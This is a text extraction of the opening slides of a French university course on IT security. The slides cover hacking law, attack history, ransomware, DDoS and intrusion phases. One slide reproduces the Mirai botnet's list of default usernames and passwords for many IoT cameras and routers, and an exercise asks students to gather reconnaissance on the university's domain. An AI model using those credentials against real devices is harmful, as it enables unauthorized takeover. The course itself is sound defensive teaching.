Cours Securite Admisys PDF

Télécharger au format pdf ou txt
Télécharger au format pdf ou txt
Vous êtes sur la page 1sur 459

Sécurité Informatique

[email protected]

March 2, 2020

[email protected] Sécurité Informatique/ March 2, 2020 1 / 459


"Tu es fort petit, très fort, mais tant que je serais dans
le métier, tu ne seras jamais que le second."
The MASK

[email protected] Sécurité Informatique/ March 2, 2020 2 / 459


Pirater n’est pas un jeu

Ce que vous apprendrez ici est destiné à la protection, pas à


l’attaque. Mais si cela vous amuse :
Certains organismes "anodins" sont sous la protection de la
DGSI ou pire...
Quand vous réussissez à pirater un organisme c’est parce que
Il ne fait pas de sécurité
Il a une bonne sécurité, mais avec une faille. Il a donc des
journaux qu’il analyse.
Vous avez piraté un Honeypot. Bravo vous êtes sous
microscope.
Accord international G8-24
Gel de situation de police à police,
Regularisation judiciaire par la suite.

[email protected] Sécurité Informatique/ March 2, 2020 3 / 459


Dura Lex Sed Lex

Accès et maintien :
Pénal : Art 323-1 : 30 000 e, 2 ans de prison
si en plus altération : 45 000 e, 3 ans de prison
si en plus STAD de l’état : 75 000 e, 5 ans de prison
Entrave au système d’information :
Pénal : Art 323-2 : 75 000 e, 5 ans de prison.
si en plus STAD de l’état : 100 000 e, 7 ans de prison
Possession d’outils de piratage :
Pénal : peines identiques aux infractions "possibles".

[email protected] Sécurité Informatique/ March 2, 2020 4 / 459


Dura Lex Sed Lex : résumé

Pour résumer
"Pas vu, Pas pris
Vu : Niqué !"

[email protected] Sécurité Informatique/ March 2, 2020 5 / 459


Phrases essentielles

"Some rules can be bent,others.... can be broken."Morpheus


"Ne pas croire ce que l’on te dit. Toujours re-vérifier" Gibbs
règle n°3
"Ne jamais rien prendre pour acquis" Gibbs règle n°8
"L’homme intelligent résoud les problèmes, l’homme sage les
évite"

[email protected] Sécurité Informatique/ March 2, 2020 6 / 459


Quel est l’objectif de la sécurité informatique ?

Protéger l’infrastructure informatique ?


Assurer son intégrité ?
Assurer sa confidentialité ?
Assurer sa disponibilité ?
Assurer son auditabilité ?
Empêcher les accès aux utilisateurs ?

[email protected] Sécurité Informatique/ March 2, 2020 7 / 459


En-êtes vous sûrs ?

Quelqu’un diffuse du Phishing sous votre nom :


Notion d’image
Perte de marchés
Et pourtant aucun "dégât informatique"
Alors que l’on peut réduire le risque informatiquement
Vol / Destruction d’un serveur ?
Protection physique (est-ce votre rôle ?)
Sauvegarde

[email protected] Sécurité Informatique/ March 2, 2020 8 / 459


Le bon objectif

Protéger l’entreprise
Y compris sa version non informatique
Par des moyens informatiques
Si vous n’en êtes pas convaincus, essayez d’en convaincre vos
interlocuteurs.

[email protected] Sécurité Informatique/ March 2, 2020 9 / 459


Comment faire

Evaluer
Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?
Définir les rôles : politique de sécurité
Qui fait quoi, comment et quand ?
Qui peut faire quoi, comment et quand ?
Définir un plan d’action
Quelle sont les priorités ?

[email protected] Sécurité Informatique/ March 2, 2020 10 / 459


Évaluer

Les difficultés
Le contexte
Quels sont les risques ?
Quelles sont les menaces ?
La sécurité se mesure-t-elle ?

[email protected] Sécurité Informatique/ March 2, 2020 11 / 459


Les difficultés

Génère des désagréments


L’empêcheur de surfer en rond.
Beaucoup de travail
Nécessite de fortes compétences
en réseau, en système, en droit, et une remise à niveau
permanente
Coûte de l’argent
et ne rapporte rien
Pas de reconnaissance
Si ça marche : "A quoi ça sert ?"
Sinon : "Vous êtes nul !"

[email protected] Sécurité Informatique/ March 2, 2020 12 / 459


Le contexte : Internet

Historique
Connexion de bout en bout
Réseau ouvert

[email protected] Sécurité Informatique/ March 2, 2020 13 / 459


Historique

1962 : Réseau militaire


1968 : Premiers tests réseau à paquets
1 Octobre 1969 Arpanet(RFC,UNIX)
Septembre 1978 : IPv4
1991 : Création de WWW par Tim Lee Werners
1992 : Découverte d’Internet par le grand public

[email protected] Sécurité Informatique/ March 2, 2020 14 / 459


Connexion de bout en bout

les RFC 1122 et 1123 définissent les règles pour les machines
Accessibilité totale
On fait ce que l’on dit, et l’on dit ce que l’on fait
Signaler quand cela ne marche pas
Signaler pourquoi
Système ouvert
Finger
Rexec
Sendmail

[email protected] Sécurité Informatique/ March 2, 2020 15 / 459


Réseau ouvert

Entraide : prêt de ressources


Sendmail → relayage de spams
DNS → saturation de serveurs distants
Assistance au débogage
EXPN et VRFY de sendmail → collecte d’informations
XFER DNS → cartographie de réseaux

[email protected] Sécurité Informatique/ March 2, 2020 16 / 459


Les risques

Destruction de données
Perte de marchés
Perte de temps et donc d’argent
Risques juridiques

[email protected] Sécurité Informatique/ March 2, 2020 17 / 459


Destruction de données

Comptabilité
Données clients
R & D, Conception, Production
Les PME meurent dans les 3 mois.

[email protected] Sécurité Informatique/ March 2, 2020 18 / 459


Perte de marché

Vol ou divulgation d’information


Recherche et développement
Fichier client
Dégradation de l’image
Modification du site web
Divulgation d’informations
Perte de confiance

[email protected] Sécurité Informatique/ March 2, 2020 19 / 459


Pertes financière et boursière

Exemple de Yahoo

[email protected] Sécurité Informatique/ March 2, 2020 20 / 459


Pertes financière et boursière

Mais ce n’est pas toujours le cas

[email protected] Sécurité Informatique/ March 2, 2020 21 / 459


Pertes financière et boursière

Cause ou conséquence ?

http://riskbasedsecurity.com

[email protected] Sécurité Informatique/ March 2, 2020 22 / 459


Perte de temps et donc d’argent

Arrêt de la production
Recherche des causes
Remise en état

[email protected] Sécurité Informatique/ March 2, 2020 23 / 459


Risques juridiques

Lois françaises
Échanges illégaux (terrorisme/pédopornographie/P2P),
Attaques par rebond,
Confidentialité des données personnelles (Article 226-17 et
Article 226-34),
GDPR / RGPD (Règlement européen : 25 Mai 2018).
2 à 4% du chiffre d’affaire mondial
10-20 Mepour les administrations
Contrats
Disponibilité
Lois internationales
Loi Sarbanes-Oxley (US)
Réglementation Bâle II

[email protected] Sécurité Informatique/ March 2, 2020 24 / 459


Les menaces : attaques

Historique
Niveau des attaques
Types d’attaque
Déroulement d’une attaque

[email protected] Sécurité Informatique/ March 2, 2020 25 / 459


Les attaques : pré-historique

1975 : Jon Postel pressent le SPAM


→ 1983 : blagues de potaches
1983 : Wargames
Août 1986 : Cukoo’s egg (1989) Clifford Stoll : 1er Honeypot.
(0.75$)
2 Novembre 1988 : Ver de Morris
10% du parc mondial (6000 sur 60000)
Création du CERT

[email protected] Sécurité Informatique/ March 2, 2020 26 / 459


Les attaques : historique

2001 : Code Rouge


24 janvier 2003 : Slammer
(376 octets)
doublait toutes les 2,5 secondes
90% des hôtes vulnérables infectés en 10 minutes
2004 : Location de zombies
2008 : Les Anonymous commencent leurs attaques

[email protected] Sécurité Informatique/ March 2, 2020 27 / 459


Les attaques : contemporain
2009 : Conficker (7%, Militaire, 250 K$, MD6).. 50 PC par
semaine sur Renater.
2010 : Opération Aurora, Mariposa (13 M), Comodo,
Stuxnet, etc.
2011 : Affaire DigiNoTar (certificat *.google.com),
2012 : Pacemakers, Piratage de l’Élysée,
2013 : PRISM (Snowden), Backdoor DLink
2014 : Cryptolocker, Shellshock(98), Sony, FIN4, Failles SSL
(Poodle, Heartbleed)
2015 : Cyberdjihadisme, Hacking Team, Full HTTPS, Ashley
Madison, Backdoor Cisco
2016 : DNC, Méga DDos, IoT, Shadow Brokers
2017 : Cryptominers, Equifax, Accenture, AWS public bucket,
Wannacry
2018 : Meltdown et consorts, les bibliothèques
(event-stream), memcached et DDoS
[email protected] Sécurité Informatique/ March 2, 2020 28 / 459
Ashley Madison

Site d’adultère, 36 millions d’utilisateurs


Piraté le 15 juillet 2015 par Impact Team Wikipédia
300 Go de données (nom, mail (pro souvent), mot de passe,
adresse, paiements effectués)
11 millions de mots de passe chiffrés avec un salted MD5
5,5 millions de femmes. 70529 bots féminins (43 bots
masculins)
Pour plus d’information sur le système Ashley-Madison
Thomas Ryan et l’expérience Robin Sage (25 ans et 10 ans
d’expérience).

[email protected] Sécurité Informatique/ March 2, 2020 29 / 459


Les attaques et événements : 2019

Année des cryptolocker (cf plus loin)


15 webstressers confisqués, et 250 utilisateurs poursuivis.
VFEmail fournisseur de mail sécurisé depuis 2001 voit son
infrastructure détruite.
Vulnérabilité RunC permet de sortir des conteneurs.
La Russie contrôle son accès Internet, et la Corée du sud
bloque eSNI
Des villes américaines touchées par des ransomwares
(Baltimore, 2 fois, arrêt de 2 semaines)
La cryptomonnaie dépasse globalement les ransomware, puis
baisse drastique suite à l’arrêt de Monero.
Les certificats EV ne servent "plus à rien".

[email protected] Sécurité Informatique/ March 2, 2020 30 / 459


Les attaques et événements : 2020

Cryptolocker Bouygues (10 millions de rançon demandés).


Bezos a vu son smartphone piraté.

[email protected] Sécurité Informatique/ March 2, 2020 31 / 459


Les attaques "rigolotes"

Les faiblesses de l’authentification SMS


Le capteur luminosité utilisé pour détecter la TZ d’un client
web
Les capteurs d’orientation des smartphone pour deviner vos
mots de passe
IOS fitness pulsation cardiaque/ validant les achats grâce à la
lecture "au dessus" de l’empreinte digitale

[email protected] Sécurité Informatique/ March 2, 2020 32 / 459


Le phénomène Cryptolocker

Le modèle passe de "Tata Jacotte" au "Big Game Hunting".


Norsk Hydro se fait rançonner, et cela lui coûte 46 M$
Altran (AD, cryptolocker + 1 M$ de rançon) se font pirater
Arrêt de Fleury Michon, l’université de Corse, CHU de Rouen
(250K€), Université de Brest.
Déplacement latéral, accès AD, destruction des snapshots et
sauvegarde
Groupes "Etatiques" pour de l’argent: TA505 par exemple.
Prix moyen de 40K€ à 80K€
60% par accès RDP, 26% par Phishing.
3500 extensions différentes des cryptolockeurs.
Arrêt de 1 semaine à 1 mois.
Ajout d’une capacité de "RGPD-Ransomware".

[email protected] Sécurité Informatique/ March 2, 2020 33 / 459


Hacktivisme

[email protected] Sécurité Informatique/ March 2, 2020 34 / 459


Hacktivisme

[email protected] Sécurité Informatique/ March 2, 2020 35 / 459


Les attaques : en temps réel

http://map.honeynet.org

[email protected] Sécurité Informatique/ March 2, 2020 36 / 459


Les attaques : en temps réel 2

http://cybermap.kaspersky.com

[email protected] Sécurité Informatique/ March 2, 2020 37 / 459


Les attaques : en temps différé

https://zone-h.org

[email protected] Sécurité Informatique/ March 2, 2020 38 / 459


Les attaques : en temps différé

[email protected] Sécurité Informatique/ March 2, 2020 39 / 459


Les attaques : en devenir

https://www.openbugbounty.org

[email protected] Sécurité Informatique/ March 2, 2020 40 / 459


Niveau des attaques

Niveau

Fast Flux

Phishing Crypto High tech

Attaques distribuées Réseau C&C P2P


Attaques web
Interface graphique
Obfuscation
Maquillage de paquets Déni de service

Exploration de réseau (scan) Techniques furtives

Utilisation de SNMP

Désactivation des journaux


Détournement de sessions

Backdoor

Exploitation de vulnérabilités connues


Décryptage de mot de passe
Code Auto-répliquant

Essai de mots de passe

1980 1985 1990 1995 2005 2010 2015

[email protected] Sécurité Informatique/ March 2, 2020 41 / 459


Type des attaquants : par compétence

Script Kiddy
90% playstation 9% clickomane 1% intelligence
utilise ce que font les autres
Amateur
Failles connues
Failles web
Professionnel
En équipe
Avec beaucoup de moyens (financiers, techniques, parfois
préparatoires)
0days possibles, voire courants.

[email protected] Sécurité Informatique/ March 2, 2020 42 / 459


Type des attaquants : par objectif

L’argent
piratage volumétrique
cryptolocker/cryptominage
Hacktiviste
"Terroriste"
Anonymous
Espions
Etatique
Industriel
"Petit con"

[email protected] Sécurité Informatique/ March 2, 2020 43 / 459


Évolution des attaquants

Ne pas se méprendre
Si la moyenne des pirates est plus bête qu’avant,
les meilleurs pirates sont bien meilleurs qu’avant
plus psychologues (Social Engineering, virus)
plus pragmatiques (Efficacité, Argent)
plus techniques.

[email protected] Sécurité Informatique/ March 2, 2020 44 / 459


Compétences des pros

Voici, selon un rapport de CrowdStrike de 2019 les performances


des pirates "non occidentaux" et soutenus par de gros sponsors.
Groupe Sponsor Temps d’intrusion
Bear (alias APT-28) Russie 00:18:49
Chollima (alias APT-38) Corée du Nord 02:20:14
Panda (alias PLA Unit 61398) Chine 04:00:26
Kitten (alias APT-34) Iran 05:09:04
Spider eCrime 09:42:23
Source https://www.crowdstrike.com, performances
Source https://www.fireye.com, liste des groupes APT

[email protected] Sécurité Informatique/ March 2, 2020 45 / 459


But des attaques

Constitution d’un parc de zombies


Campagne de SPAMs
Campagne de phishing
Campagne de racket
Tag
Casse
Vol (codes bancaires, espionnage, marketing agressif)
Spyware, Keylogger, cryptolocker etc.

[email protected] Sécurité Informatique/ March 2, 2020 46 / 459


Économie cybercrimininalité : version simplifiée

Pseudo Vol bancaire


Antivirus
Antivirus par keylogger

Chinese
TuringFarm
SCAM
Captcha
Piratage
Protection d’une
Serveur Web entreprise
Massmailing
Virus
Chantage
Phishing
crédibilisé
Bot
par mot de passe

PC Vol
d’identité Doxing

Usurpation
DDoS Racket

Déstabilisation
d’une entreprise Disparition
Pirate concurrent
Argent
Cryptolocker
Spam Viagra

Cryptominage

Spam Blog

Protection IP FAI
Firewall, Blacklist bullet proof
Intrusion
XSS
Serveur

Faux
Call Center
Site de
phishing
ou de vente
Site
médicaments
"WaterHole"

Faille Ver
Espionnage

Game Cracking

Jeu
Cheat

[email protected] Sécurité Informatique/ March 2, 2020 47 / 459


Économie Virale : quelques chiffres
Phreaking téléphonique : 2 000 - 70 000 epar attaque réussie.
en 2019, pour un investissement de 500 $ dans un RaaS, on
obtient 3000 $ en 3 mois.
30% des américains ont acheté après un spam.
ROI de "indian herbal" : coût 0,1 centimes, vendu 65 e.
Vol d’identité.
Perte estimée pour le vol d’une identité : 400 e(bénéfice pour
le pirate : entre 50 et 100 e))
en 2007, l’estimation des pertes dues à la cybercriminalité était
de plus de 1 milliard par an.
Depuis 2007 C.A. cybercriminalité >C.A. drogue. 2018 : 600
milliards $
Virus locky a rapporté 100 M$.
Le "RaaS" Gandcrab se retire après avoir fait payer 2 milliards
de $ aux victimes.
Le "Cheat" jeu vidéo rapporterait plus que la cybercriminalité
classique.
Pourquoi les sites porno et les sites proxy sont gratuits ?
[email protected] Sécurité Informatique/ March 2, 2020 48 / 459
Proposition d’emploi

et puis il y a Amazon Mechanical Turk


et puis il y a uncaptcha2 (pour que Google pirate Google)

[email protected] Sécurité Informatique/ March 2, 2020 49 / 459


Proposition de services

[email protected] Sécurité Informatique/ March 2, 2020 50 / 459


Prix de failles

https://zerodium.com/program.html

[email protected] Sécurité Informatique/ March 2, 2020 51 / 459


Prix de failles mobile

https://zerodium.com/program.html

[email protected] Sécurité Informatique/ March 2, 2020 52 / 459


Type des attaques

Déni de service (saturation, D.O.S. ou D.D.O.S.)


Phishing, spear phishing
Infection (cryptolocker, mots de passe bancaires).
Piratage web
Intrusion réseau (APT)
...

[email protected] Sécurité Informatique/ March 2, 2020 53 / 459


Attaque D.O.S.

Deny Of Service ou Déni de service. Plusieurs principes de


fonctionnement
Le harcèlement
Occupation permanente de la ligne
Le livreur de pizzas
Appel de plusieurs livreurs pour une fausse adresse
Voir backscatter pour le repérage
Le chewing gum dans la serrure

[email protected] Sécurité Informatique/ March 2, 2020 54 / 459


Attaque D.D.O.S.

Distributed Deny Of Service ou déni de service distribué.


D.O.S. appliqué par plusieurs (dizaines de milliers de)
machines
Généralement de type "livreur de pizzas"
Rarement évitable (sauf par des sociétés internationales
spécialisées)
Volume maximal actuel :
1 Tbit/s (19 septembre 2016)
1.35 Tbit/s par de serveurs memcached (mars 2018)
https://www.ovh.com/fr/blog/cybersecurite/

[email protected] Sécurité Informatique/ March 2, 2020 55 / 459


Déni de service contre akamaï avec memcached

source https://www.bleepingcomputer.com

[email protected] Sécurité Informatique/ March 2, 2020 56 / 459


Type de D.O.S.

Saturation de la bande passante (UDP)


10000 zombies
Impossible de lutter seul (se "cacher" derrière OVH,
CloudFlare, etc.)
Saturation de la table des connexions (TCP)
1000 zombies
Lutte : utilisation des syncookies
Saturation du nombre processus
100 zombies mais les machines sont "grillées", connaissance
minimale
Lutte : limitation du nombre de processus, repérage et blocage
très tôt

[email protected] Sécurité Informatique/ March 2, 2020 57 / 459


Type de D.O.S.

Saturation de la CPU
10 zombies mais les machines sont "grillées", connaissances
pointues
exemple: requêtes SQL massive
Lutte : limitation de la CPU (noyau), mod_evasive (http)
Plantage distant
1 zombie. Expertise nécessaire
Empoisonnement des caches CDN
Patch régulier, durcissement noyau, protection applicative

[email protected] Sécurité Informatique/ March 2, 2020 58 / 459


Et si kon ve fer mé kon sé pa

source http: // www. ddosservice. com

[email protected] Sécurité Informatique/ March 2, 2020 59 / 459


Piske ma copine me quitte, je DDoS

source
https: // pasillo. renater. fr/ weathermap/ weathermap_
metropole. html
[email protected] Sécurité Informatique/ March 2, 2020 60 / 459
La protection DDoS

Elle se prépare, comme toute gestion de crise.


Savoir ce que l’on est prêt à sacrifier (ou pas)
En terme de correspondants
En terme de services
Les procédures
Les concevoir (qui fait quoi comment, les interlocuteurs)
Les rédiger
Les valider

[email protected] Sécurité Informatique/ March 2, 2020 61 / 459


La protection DDoS

Elle est multi-niveaux


Volumétrique (FAI)
Connexion (Réseau)
Applicative (Développement)
Elle a ses risques propres
Perte localisée de connexion (syncookie)
Latence en régime de croisière (limites
CPU/process/RAM/disque)
Risque d’interception "high level" : cloudflare / OVH / etc.

[email protected] Sécurité Informatique/ March 2, 2020 62 / 459


Pause TP : DDoS

Résumez en 5 lignes cette page web


https://www.ovh.com/fr/blog/
rapport-attaques-ddos-observees-par-ovh-en-2017/
Trouvez un tarif actuel pour du DDoS

[email protected] Sécurité Informatique/ March 2, 2020 63 / 459


Déroulement d’attaque phishing

[email protected] Sécurité Informatique/ March 2, 2020 64 / 459


Déroulement d’attaque infection

[email protected] Sécurité Informatique/ March 2, 2020 65 / 459


Déroulement d’attaque infection / protection

[email protected] Sécurité Informatique/ March 2, 2020 66 / 459


Déroulement d’attaque infection contournement

[email protected] Sécurité Informatique/ March 2, 2020 67 / 459


Déroulement d’attaque intégration botnet

[email protected] Sécurité Informatique/ March 2, 2020 68 / 459


Déroulement d’attaque infection pour Spam/Virus

[email protected] Sécurité Informatique/ March 2, 2020 69 / 459


Déroulement d’attaque infection pour DDoS

[email protected] Sécurité Informatique/ March 2, 2020 70 / 459


Déroulement d’un piratage web

[email protected] Sécurité Informatique/ March 2, 2020 71 / 459


Déroulement d’un piratage réseau

[email protected] Sécurité Informatique/ March 2, 2020 72 / 459


Déroulement d’une attaque intrusion

Collecte d’informations
Repérage des vulnérabilités
Utilisation des vulnérabilités → intrusion
Accession aux droits administrateur (escalade)
Camouflage
Installation d’une backdoor

[email protected] Sécurité Informatique/ March 2, 2020 73 / 459


Collecte des informations

Par "social engineering" ou manipulation psycho-relationnelle


Par ingénierie informationnelle
Par interrogation TCP/IP
Scan (de ports ou de machines)
Rapide/lent
Classique/furtif
Interrogation des services
Cartographie DNS
Récupération des versions
Récupération des options

[email protected] Sécurité Informatique/ March 2, 2020 74 / 459


Attaques : quelques statistiques à l’UT1

Ces chiffres sont des moyennes en 2020


1000 tests par seconde ( 170 millions par jour )
2 à 5 campagnes de phishing par jour.
Plus quelques pointes.
95 000 tests par seconde pendant 72 h en 2015
400 000 tests par seconde pendant 2 heures en 2019

[email protected] Sécurité Informatique/ March 2, 2020 75 / 459


Attaques : incidents à l’UT1

106 incidents de sécurité depuis 14 ans dont


1 cryptolocker
18 incidents de phishing
57 virus (sortants ou crypto) sur des postes
2 intrusions automatiques (vers) sur des serveurs
1 boite noire piratée (ShellShock)
2 "DDoS" réussis en Février 2015.
Année Total Virus Phishing Autres Commentaires
2020 1 0 1 Cryptolocker, HIBP
2019 22 8 2 12 Escroquerie, HIBP
2018 18 8 2 8 Piratage serveurs, HIBP
2017 8 3 4 1 Parasitisme avancé
2016 12 6 1 5 3 DoS, 2 extorsions
2015 16 8 4 4 2 DoS

[email protected] Sécurité Informatique/ March 2, 2020 76 / 459


Attaques : nombre mensuel de tests

RRDTOOL / TOBI OETIKER


Infractions sur 1 mois
20 k

10 k

0
dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim.

Infractions sortantes par seconde Infractions entrantes par seconde

[email protected] Sécurité Informatique/ March 2, 2020 77 / 459


Attaques : nombre d’attaquants

RRDTOOL / TOBI OETIKER


Quarantaine sur 1 mois
8 k

7 k

6 k

5 k

4 k

3 k

2 k

1 k

0
dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim.

Quarantaine en sortie par heure Quarantaine en entree par heure

[email protected] Sécurité Informatique/ March 2, 2020 78 / 459


Attaques : raisons de la quarantaine sur une journée

[email protected] Sécurité Informatique/ March 2, 2020 79 / 459


Pourquoi les services sont vulnérables ?

Mauvaise conception (volontaire ou non)


Peace and Love : REXEC
Backdoor : FSP,EGGDrop
Incompétence : WEP
Complexité : OpenSSL, Bash, WPA2
Mauvaise configuration
postfix, DNS, HTTP
Mauvaise utilisation
Scripts php, cgi-bin incorrects
Mauvais utilisateurs
Clickophile
Manque d’intelligence entre la chaise et le clavier

[email protected] Sécurité Informatique/ March 2, 2020 80 / 459


Heureusement

C’est super dur de trouver des failles

[email protected] Sécurité Informatique/ March 2, 2020 81 / 459


Site de recensement de failles

source http: // www. cvedetails. com

[email protected] Sécurité Informatique/ March 2, 2020 82 / 459


Heureusement

C’est super dur de trouver comment exploiter des failles

[email protected] Sécurité Informatique/ March 2, 2020 83 / 459


Site d’utilisation de failles

source http: // www. exploit-db. com

[email protected] Sécurité Informatique/ March 2, 2020 84 / 459


Mais on l’a déjà vu çui-là ?

source http: // www. openbugbounty. com

[email protected] Sécurité Informatique/ March 2, 2020 85 / 459


Plus méchant : distribution de icepack

[email protected] Sécurité Informatique/ March 2, 2020 86 / 459


Heureusement

Les antivirus nous protègent.

[email protected] Sécurité Informatique/ March 2, 2020 87 / 459


Les antivirus

[email protected] Sécurité Informatique/ March 2, 2020 88 / 459


M’en fous

je ne prends que des logiciels / codes / applications signés

[email protected] Sécurité Informatique/ March 2, 2020 89 / 459


Le code signing

source
https://www.bleepingcomputer.com

[email protected] Sécurité Informatique/ March 2, 2020 90 / 459


Heureusement

Les entreprises informatiques savent faire

[email protected] Sécurité Informatique/ March 2, 2020 91 / 459


Vous voulez prendre le contrôle de caméras (Mirai)?

source https://krebsonsecurity.com

[email protected] Sécurité Informatique/ March 2, 2020 92 / 459


Version plus lisible
Matériel Login Password
ACTi IP Camera admin 123456
ANKO Products DVR root anko
Axis IP Camera root pass
Dahua Camera root vizxv
Dahua DVR root 888888
Dahua DVR root 666666
Dahua IP Camera root 7ujMko0vizxv
Dahua IP Camera root 7ujMko0admin
Dahua IP Camera 666666 666666
Dreambox TV receiver root dreambox
EV ZLX Two-way Speaker root zlxx
Guangzhou Juan Optical root juantech
H.264 – Chinese DVR root xc3511
HiSilicon IP Camera root klv1234
HiSilicon IP Camera root jvbzd
IPX-DDK Network Camera root admin
IQinVision Cameras root system
Mobotix Network Camera admin meinsm
Packet8 VOIP Phone root 54321
Panasonic Printer root 00000000
RealTek Routers root realtek
Samsung IP Camera admin 1111111
Shenzhen Anran Security Camera root xmhdipc
SMC Routers admin smcadmin
Toshiba Network Camera root ikwb
Ubiquiti AirOS Router ubnt ubnt
VideoIQ supervisor supervisor
Vivotek IP Camera root <none>
Xerox printers admin 1111
ZTE Router root Zte521

[email protected] Sécurité Informatique/ March 2, 2020 93 / 459


Microsoft vous protège du flash

Parce que Flash c’est, en moyenne, 60 vulnérabilités critiques


par an
Mais quand même Facebook, c’est des potes, comme
music.microsoft.com
poptropica.com
vudu.com
et 54 autres sites.
source https://www.scmagazine.com
source https://cvedetails.com

[email protected] Sécurité Informatique/ March 2, 2020 94 / 459


Heureusement

Les grosses entreprises ne se font jamais pirater.

[email protected] Sécurité Informatique/ March 2, 2020 95 / 459


Les plus grosses fuites de données

source http: // www. informationisbeautiful. net

[email protected] Sécurité Informatique/ March 2, 2020 96 / 459


Ma banque elle, elle risque rien

[email protected] Sécurité Informatique/ March 2, 2020 97 / 459


Ma banque elle, elle risque rien

[email protected] Sécurité Informatique/ March 2, 2020 98 / 459


Les entreprises se font peut-être avoir, mais elles assument

[email protected] Sécurité Informatique/ March 2, 2020 99 / 459


Les entreprises se font peut-être avoir, mais elles assument

Un client du FAI VirginMedia demande une RAZ de son mot


de passe.
Virginmedia lui envoie son ancien mot de passe en clair par
mail !
Le client s’en offusque
Réponse :

Posting it to you is secure, as it’s illegal to open someone else’s


mail. JGS
— Virgin Media (virginmedia) August 17, 2019

Thank god criminals don’t break laws.


— Joseph Cox (josephfcox) August 17, 2019

[email protected] Sécurité Informatique/ March 2, 2020 100 / 459


Les entreprises se font peut-être avoir, mais elles assument

[email protected] Sécurité Informatique/ March 2, 2020 101 / 459


Les entreprises se font peut-être avoir, mais elles assument
(2)

Un générateur d’excuses en bois

[email protected] Sécurité Informatique/ March 2, 2020 102 / 459


Ouais, mais on s’en fout

Mon mot de passe de messagerie, je m’en fous. Tout ça c’est que


du virtuel.

[email protected] Sécurité Informatique/ March 2, 2020 103 / 459


Les plus dangereuses fuites de données : Marriott

[email protected] Sécurité Informatique/ March 2, 2020 104 / 459


Les plus dangereuses fuites de données : police

[email protected] Sécurité Informatique/ March 2, 2020 105 / 459


Pourquoi dans le désert Irakien on voit ça ?

[email protected] Sécurité Informatique/ March 2, 2020 106 / 459


Que du virtuel hein ?

[email protected] Sécurité Informatique/ March 2, 2020 107 / 459


Heureusement

On peut repérer les pirates quand ils cherchent des failles.

[email protected] Sécurité Informatique/ March 2, 2020 108 / 459


Shodan, Censys, Zoomeye etc.

http://www.shodan.io
https://censys.io
https://www.zoomeye.org

[email protected] Sécurité Informatique/ March 2, 2020 109 / 459


Définir les rôles : politique de sécurité

Que voulez-vous faire ?


Qui fait quoi, comment et quand ?
Les pièges à éviter

[email protected] Sécurité Informatique/ March 2, 2020 110 / 459


Que voulez-vous faire ?

Protéger contre la CIA/NSA/GRU ?


Protéger contre des adversaires précis ?
Protéger contre l’interne ?
Protéger contre le "normal" ?
N’oubliez jamais
Vous voulez assurer la survie de votre organisme

[email protected] Sécurité Informatique/ March 2, 2020 111 / 459


Qui aura le droit de faire quoi ?

Politique de sécurité
Le web est autorisé pour qui, pour quoi ?
Qui peut utiliser la messagerie ?
Qui définit les règles ?
Qui les annonce et comment ?
Quelles sont les sanctions ?

[email protected] Sécurité Informatique/ March 2, 2020 112 / 459


Les pièges à éviter

Tenter l’impossible
Faire du tout sécuritaire

[email protected] Sécurité Informatique/ March 2, 2020 113 / 459


A l’impossible nul n’est tenu

Efficacité

100%

Coût :
●Financier,

0% ●Compétence,

●Désagréments

[email protected] Sécurité Informatique/ March 2, 2020 114 / 459


Eviter le tout sécuritaire

Fragilise votre soutien par la DG


Provoque des tentatives de contournements
Préférer empêcher à interdire

Rappel
Votre but est que "votre organisme fonctionne" pas de
concurrencer Fort Knox

[email protected] Sécurité Informatique/ March 2, 2020 115 / 459


Un exemple ?

"Le mot de passe doit faire 12 caractères avec 4 catégories"


La "meilleure" solution
C’est 20 caractères sans obligation,
ou 2 mots avec un espace pour 16 caractères.

[email protected] Sécurité Informatique/ March 2, 2020 116 / 459


Les priorités

Empêcher les agressions (volontaires ou non) : Protection


Repérer les agressions: Détection
Confiner les agressions et limiter leurs conséquences
Accumuler les preuves
Comprendre, apprendre, retenir (itération)
Retour à la normale

[email protected] Sécurité Informatique/ March 2, 2020 117 / 459


La protection

Nous parlerons ici de la protection dite périmétrique


Partie la plus efficace
70% à 80% d’attaques en moins (les choses changent)
La moins coûteuse
en temps
en argent
en compétence
La plus stable dans le temps
La plus visible

[email protected] Sécurité Informatique/ March 2, 2020 118 / 459


La détection

La détection permet de réagir


Permet de prévoir l’avenir
scan sur des ports inconnus
analyse des comportement anormaux
Permet de justifier les coûts
En présentant correctement les informations

[email protected] Sécurité Informatique/ March 2, 2020 119 / 459


Confinement des agressions

"Réactif" en cas d’échec de protection


Protection en profondeur
Doit être placé "en plus" avant la détection (proactif)
De plus en plus utile avec les vers

[email protected] Sécurité Informatique/ March 2, 2020 120 / 459


Accumuler les preuves

Optionnel
En cas de recours en justice
A notre initiative
Mais aussi à notre encontre
Tâche ingrate et rarement effectuée
Réputation
Argent
Temps

[email protected] Sécurité Informatique/ March 2, 2020 121 / 459


Comprendre, apprendre, retenir

L’attaque a réussi
Pourquoi ?
Comment y remédier ?
Parer à la faille utilisée
Réfléchir à une généralisation de cette faille

[email protected] Sécurité Informatique/ March 2, 2020 122 / 459


Remise en état

Plan de reprise/Plan de secours


Si elle est faite avant de comprendre
Vous ne pourrez apprendre
Vous n’aurez donc rien appris
Vous resubirez l’attaque
Nécessité d’une machine à remonter le temps
Phase rarement testée

[email protected] Sécurité Informatique/ March 2, 2020 123 / 459


Collecte des informations : exercices

Exercice 1 : Ingénierie informationnelle


Collecter toute information utile pour attaquer le domaine
ut-capitole.fr

Exercice 2 : jouons avec nmap


Découvrir les utilisations de NMAP, pour les ports, les applications,
les versions.

[email protected] Sécurité Informatique/ March 2, 2020 124 / 459


Résolution des problèmes

La tronçonneuse
Le ciseau à bois
Le papier de verre
La lazure

[email protected] Sécurité Informatique/ March 2, 2020 125 / 459


La tronçonneuse

On enlève l’inutile :
Protection contre l’extérieur;
Protection contre l’intérieur;
Protection à l’intérieur.

[email protected] Sécurité Informatique/ March 2, 2020 126 / 459


Protection contre l’extérieur

Travail effectué par le firewall :


On bloque tout ce qui vient de l’extérieur;
Hormis ce qui est spécifiquement autorisé;
Le tout basé sur une notion de port;
Les entrées sont limitées en rapidité;
On jette et on n’avertit pas.

[email protected] Sécurité Informatique/ March 2, 2020 127 / 459


Protection contre l’intérieur

Tout est autorisé en sortie SAUF


Ce qui est offert en interne
DNS, SMTP, NTP, etc.
Ce qui est dangereux pour l’extérieur
